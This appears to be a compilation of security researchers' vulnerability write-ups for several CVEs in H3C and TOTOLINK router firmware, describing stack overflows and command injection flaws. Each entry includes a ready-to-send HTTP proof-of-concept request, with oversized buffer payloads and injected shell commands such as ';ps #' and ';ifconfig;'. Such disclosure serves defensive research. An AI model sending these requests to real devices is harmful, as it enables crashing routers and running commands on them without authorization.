H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function Edit_BasicSSID_5G.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the Edit\_BasicSSID\_5G function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the Edit_BasicSSID_5G function, V30(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V31, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=Edit_BasicSSID_5G&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36473: vuln/readme.md at main · Darry-lang1/vuln

H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function WlanWpsSet.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the WlanWpsSet function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the WlanWpsSet function, V5(the valueparam) we entered is formatted using the sscanf function and in the form of %d;%[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V7, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=WlanWpsSet&param=1;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36474: vuln/readme.md at main · Darry-lang1/vuln

TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a stack overflow via the command parameter in the function setTracerouteCfg.

Permalink

Cannot retrieve contributors at this time

**TOTOLink A3700R V9.1.2u.6134\_B20201202 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=69&ids=36

**Product Information**

TOTOLink A3700R V9.1.2u.6134\_B20201202 router, the latest version of simulation overview：

**Vulnerability details**

Var is formatted into V6 through sprintf function, and Var is the value of command we enter. The size of the format string is not limited, resulting in stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Length: 561
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Cookie: SESSION_ID=2:1658224702:2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Pragma: no-cache
    Cache-Control: no-cache
    
    {"topicurl": "setting/setTracerouteCfg","command": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
    

The above figure shows the POC attack effect

As shown in the figure above, we can hijack PC registers.

Finally, you can write exp to get a stable root shell without authorization.

CVE-2022-36463: vuln/readme.md at main · Darry-lang1/vuln

TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a stack overflow via the sPort parameter in the function setIpPortFilterRules.

Permalink

Cannot retrieve contributors at this time

**TOTOLink A3700R V9.1.2u.6134\_B20201202 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=69&ids=36

**Product Information**

TOTOLink A3700R V9.1.2u.6134\_B20201202 router, the latest version of simulation overview：

**Vulnerability details**

V8 is formatted into V16 through sprintf function, and V8 is the value of sPort we enter. The size of the format string is not limited, resulting in stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Length: 584
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Cookie: SESSION_ID=2:1658224702:2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Pragma: no-cache
    Cache-Control: no-cache
    
    {"topicurl": "setting/setIpPortFilterRules","addEffect":"1","sPort": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
    

The above figure shows the POC attack effect

As shown in the figure above, we can hijack PC registers.

Finally, you can write exp to get a stable root shell without authorization.

CVE-2022-36464: vuln/readme.md at main · Darry-lang1/vuln

H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function SetAPWifiorLedInfoById.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the SetAPWifiorLedInfoById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetAPWifiorLedInfoById function, V7(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V11, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 546
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetAPWifiorLedInfoById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36469: vuln/readme.md at main · Darry-lang1/vuln

TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a stack overflow via the pppoeUser parameter.

Permalink

Cannot retrieve contributors at this time

**TOTOLink A3700R V9.1.2u.6134\_B20201202 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=69&ids=36

**Product Information**

TOTOLink A3700R V9.1.2u.6134\_B20201202 router, the latest version of simulation overview：

**Vulnerability details**

V12 is formatted into V67 through sprintf function, and V12 is the value of pppoeUser we enter. The size of the format string is not limited, resulting in stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Length: 608
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Cookie: SESSION_ID=2:1658224702:2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Pragma: no-cache
    Cache-Control: no-cache
    
    {"pppoeUser":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA","proto":"3","pppoeSpecType":"1","opmode":"br","topicurl":"setting\setOpModeCfg"}
    

The above figure shows the POC attack effect

As shown in the figure above, we can hijack PC registers.

Finally, you can write exp to get a stable root shell without authorization.

CVE-2022-36465: vuln/readme.md at main · Darry-lang1/vuln

TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a stack overflow via the ip parameter in the function setDiagnosisCfg.

Permalink

Cannot retrieve contributors at this time

**TOTOLink A3700R V9.1.2u.6134\_B20201202 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=69&ids=36

**Product Information**

TOTOLink A3700R V9.1.2u.6134\_B20201202 router, the latest version of simulation overview：

**Vulnerability details**

Var is formatted into V6 through sprintf function, and Var is the value of ip we enter. The size of the format string is not limited, resulting in stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Length: 560
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Cookie: SESSION_ID=2:1658224702:2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Pragma: no-cache
    Cache-Control: no-cache
    
    {"topicurl": "setting/setDiagnosisCfg","ip": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
    

The above figure shows the POC attack effect

As shown in the figure above, we can hijack PC registers.

Finally, you can write exp to get a stable root shell without authorization.

CVE-2022-36466: vuln/readme.md at main · Darry-lang1/vuln

TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a command injection vulnerability via the FileName parameter in the function UploadFirmwareFile.

Permalink

**TOTOLink A3700R V9.1.2u.6134\_B20201202 Has an command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=69&ids=36

**Product Information**

TOTOLink A3700R V9.1.2u.6134\_B20201202 router, the latest version of simulation overview：

**Vulnerability details**

TOTOLINK A3700R (V9.1.2u.6134\_B20201202) was found to contain a command insertion vulnerability in UploadFirmwareFile.This vulnerability allows an attacker to execute arbitrary commands through the "FileName" parameter.

Var is passed directly into the dosystem function.

The dosystem function is finally found to be implemented in this file by string matching.

Reverse analysis found that the function was called directly through the system function, which has a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Length: 75
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Cookie: SESSION_ID=2:1658224702:2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Pragma: no-cache
    Cache-Control: no-cache
    
    {"FileName":";ps #","ContentLength":"1","topicurl":"UploadFirmwareFile"}
    1
    

The above figure shows the POC attack effect

Finally, you can write exp to get a stable root shell without authorization.

CVE-2022-36460: vuln/readme.md at main · Darry-lang1/vuln

TOTOLink A720R V4.1.5cu.532_B20210610 was discovered to contain a command injection vulnerability via the username parameter in /cstecgi.cgi.

**TOTOLink A720R V4.1.5cu.532\_B20210610 Has an command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=14&ids=36

**Product Information**

TOTOLink A720R V4.1.5cu.532\_B20210610 router, the latest version of simulation overview：

**Vulnerability details**

TOTOLINK A720R was found to contain a command insertion vulnerability in cstecgi.This vulnerability allows an attacker to execute arbitrary commands through the "username" parameter.

We can see that the operating system will get "username" without filtering and inserting it into the strings "openvpn cert build\_user" and "gz". Therefore, if we can control "username", it can be a command injection.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi?exportOvpn=&type=user&username=;ifconfig;&filetype=gz HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.0.1/login.html
    Content-Length: 0
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Pragma: no-cache
    Cache-Control: no-cache
    

The above figure shows the POC attack effect

CVE-2022-36456: vuln/TOTOLINK/A720R/1 at main · Darry-lang1/vuln

H3C Magic NX18 Plus NX18PV100R003 was discovered to contain a stack overflow via the function SetMacAccessMode.

**H3C Magic NX18 Plus NX18PV100R003 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202103/1389284\_30005\_0.htm

**Product Information**

H3C NX18 Plus NX18PV100R003 router, the latest version of simulation overview：

**Vulnerability details**

The H3C NX18 Plus NX18PV100R003 router was found to have a stack overflow vulnerability in the SetMacAccessMode function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetMacAccessMode function, the param we entered is formatted using the sscanf function and in the form of %[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V28, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.124.1:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.124.1:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetMacAccessMode&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

Tag

#mac